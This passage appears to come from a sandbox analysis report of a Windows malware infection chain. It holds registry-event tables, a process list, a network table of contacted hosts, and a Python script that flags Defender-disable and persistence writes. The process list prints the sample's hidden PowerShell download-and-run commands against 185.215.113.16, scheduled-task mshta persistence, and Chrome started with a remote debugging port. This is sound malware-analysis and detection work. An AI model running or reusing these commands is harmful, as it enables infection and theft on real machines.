| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\rwhkbvh\apitlt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob omitted) | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob omitted) | C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = (blob omitted) | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
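The registry writes tabled in this report fall into groups that a triage script should score differently. The Windows Defender policy values under Policies\Microsoft\Windows Defender switch the named component off when set to 1 on builds that honor them. The TamperProtection write sits under the Wow6432Node-redirected Features key because a 32-bit process wrote it; Tamper Protection does not exist on the Windows 7 image used for this detonation, and on current Windows 10/11 with Tamper Protection enabled such a direct write is rejected, so it records intent rather than a successful disable. The Run-key entries for am_no.cmd and dbf56223ab.exe are plain user-level persistence. The AuthRoot\Certificates write is the weakest signal: AuthRoot is the store that the Windows automatic root update populates, and a write there during network activity is commonly the OS caching a public root, so verify the thumbprint against known public roots before reporting a rogue CA. One more detail: the writing process C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE is not a display error; the downloader command line in the process list builds the path as $env:temp+'AAVUNL...EXE' with no separator, so the payload sits in %LOCALAPPDATA% next to the Temp folder rather than inside it. The script below is an added example, not code from this report; it scores events shaped like the table rows (operation, path, data, process), and its sample events are re-typed from rows above with the quoting removed and the certificate blob elided.

```python
"""Score registry write events of the kinds tabled in this report: Windows
Defender policy tampering, Run-key persistence and AuthRoot certificate writes.
Added example; not code from the report."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

DEFENDER_POLICY_ROOT = r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender"
# Policy values that switch a Defender component off when set to 1.
DEFENDER_DISABLE_VALUES = {
    "DisableAntiSpyware", "DisableBehaviorMonitoring", "DisableIOAVProtection",
    "DisableOnAccessProtection", "DisableRealtimeMonitoring", "DisableScanOnRealtimeEnable",
}
NOTIFY_VALUE = DEFENDER_POLICY_ROOT + r" Security Center\Notifications\DisableNotifications"
# A 32-bit writer on x64 lands under Wow6432Node; accept both spellings.
TAMPER_RE = re.compile(r"\\REGISTRY\\MACHINE\\SOFTWARE\\(?:Wow6432Node\\)?Microsoft\\Windows Defender"
                       r"\\Features\\TamperProtection$", re.I)
RUN_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$", re.I)
AUTHROOT_RE = re.compile(r"\\SystemCertificates\\AuthRoot\\Certificates\\([0-9A-F]{40})\\Blob$", re.I)


@dataclass(frozen=True)
class Finding:
    severity: str      # "low" | "medium" | "high"
    rule: str
    process: str
    detail: str


def triage(events: Iterable[Tuple[str, str, str, str]]) -> List[Finding]:
    """events are (operation, registry path, data, writing process): the report's
    Description/Indicator/Process columns with the quotes around data removed.
    Only "Set value" operations are scored; key creation on its own is not."""
    findings: List[Finding] = []
    for op, path, data, proc in events:
        if not op.startswith("Set value"):
            continue
        head, _, name = path.rpartition("\\")
        if head.startswith(DEFENDER_POLICY_ROOT) and name in DEFENDER_DISABLE_VALUES and data == "1":
            findings.append(Finding("high", "defender-policy-disable", proc, name))
        elif path == NOTIFY_VALUE and data == "1":
            findings.append(Finding("medium", "defender-notifications-off", proc, name))
        elif TAMPER_RE.search(path) and data == "0":
            # Records intent: rejected where Tamper Protection is enforced, absent on Win7.
            findings.append(Finding("high", "defender-tamperprotection-off", proc, path))
        elif m := RUN_RE.search(path):
            findings.append(Finding("medium", "run-key-persistence", proc, f"{m.group(1)} -> {data}"))
        elif m := AUTHROOT_RE.search(path):
            # AuthRoot is the OS root auto-update cache: check the thumbprint against
            # known public roots before treating the write as a rogue CA.
            findings.append(Finding("low", "authroot-cert-cached", proc, m.group(1).upper()))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, dict]:
    """Per writing process: highest severity seen and the set of rules that fired."""
    rank = {"low": 0, "medium": 1, "high": 2}
    summary: Dict[str, dict] = {}
    for f in findings:
        entry = summary.setdefault(f.process, {"severity": "low", "rules": set()})
        if rank[f.severity] > rank[entry["severity"]]:
            entry["severity"] = f.severity
        entry["rules"].add(f.rule)
    return summary


# Writers as named in the report. The first path is not a typo: the downloader
# concatenated $env:temp and the file name without a separator.
HEALER = r"C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE"
SKOTES = r"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
LFLJ2TL = r"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
USER_HIVE = r"\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000"

# Re-typed from a subset of the report's rows, quoting removed, blob elided.
SAMPLE_EVENTS = [
    ("Key created", DEFENDER_POLICY_ROOT + r"\Real-Time Protection", "", HEALER),
    ("Set value (int)", DEFENDER_POLICY_ROOT + r"\DisableAntiSpyware", "1", HEALER),
    ("Set value (int)", DEFENDER_POLICY_ROOT + r"\Real-Time Protection\DisableRealtimeMonitoring", "1", HEALER),
    ("Set value (int)", DEFENDER_POLICY_ROOT + r"\Real-Time Protection\DisableBehaviorMonitoring", "1", HEALER),
    ("Set value (int)", r"\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection", "0", HEALER),
    ("Set value (int)", NOTIFY_VALUE, "1", HEALER),
    ("Set value (str)", USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd",
     r"C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd", SKOTES),
    ("Set value (data)", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates"
     r"\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob", "<blob elided>", LFLJ2TL),
]

if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.severity:6}] {f.rule:30} {f.detail}")
    for proc, info in summarize(results).items():
        print(f"{info['severity']:6} {proc}  rules={sorted(info['rules'])}")
```

On a live host, confirm Defender's effective state with Get-MpPreference and Get-MpComputerStatus rather than trusting the registry write alone: the policy values above only matter where the installed Defender build honors them.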
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 68
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\dbf56223ab.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn kBltRmaI8Wg /tr "mshta C:\Users\Admin\AppData\Local\Temp\hETCfbLxc.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
"C:\Users\Admin\AppData\Local\TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "qhfSJmalPrD" /tr "mshta \"C:\Temp\hWO8LyeS1.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\hWO8LyeS1.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef70e9758,0x7fef70e9768,0x7fef70e9778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1100 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2360 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2384 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1120 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2276 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3496 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3616 --field-trial-handle=1192,i,6655697919647179680,11338488709471288450,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5phva" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\taskeng.exe
taskeng.exe {BE56D322-AA82-4DF6-A41C-362E7701F7AC} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
C:\ProgramData\rwhkbvh\apitlt.exe
C:\ProgramData\rwhkbvh\apitlt.exe
C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe
"C:\Users\Admin\AppData\Local\Temp\1091744001\728eb8fad7.exe"
C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe
"C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe
"C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe"
C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe
"C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 508
C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"
C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe
"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| RU | 185.215.113.75:80 | 185.215.113.75 | tcp |
| US | 8.8.8.8:53 | advertised.life | udp |
| US | 104.21.94.161:443 | advertised.life | tcp |
| US | 8.8.8.8:53 | uncertainyelemz.bet | udp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.42:443 | ogads-pa.googleapis.com | tcp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| GB | 142.250.200.42:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.178.14:443 | play.google.com | tcp |
| GB | 142.250.178.14:443 | play.google.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | | tcp |
| FI | 65.109.226.203:443 | | tcp |
| FI | 65.109.226.203:443 | | tcp |
| FI | 65.109.226.203:443 | | tcp |
| DE | 104.194.157.122:80 | 104.194.157.122 | tcp |
| FI | 65.109.226.203:443 | | tcp |
| US | 8.8.8.8:53 | pirtyoffensiz.bet | udp |
| US | 104.21.42.12:443 | pirtyoffensiz.bet | tcp |
| FI | 65.109.226.203:443 | | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| US | 104.21.48.1:443 | uncertainyelemz.bet | tcp |
| FI | 65.109.226.203:443 | | tcp |
| FI | 65.109.226.203:443 | | tcp |
| NL | 185.198.234.185:80 | cobolrationumelawrtewarms.com | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| FI | 65.109.226.203:443 | 65.109.226.203 | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| N/A | 127.0.0.1:9223 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 104.21.48.1:443 | | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
| NL | 185.156.73.73:80 | 185.156.73.73 | tcp |
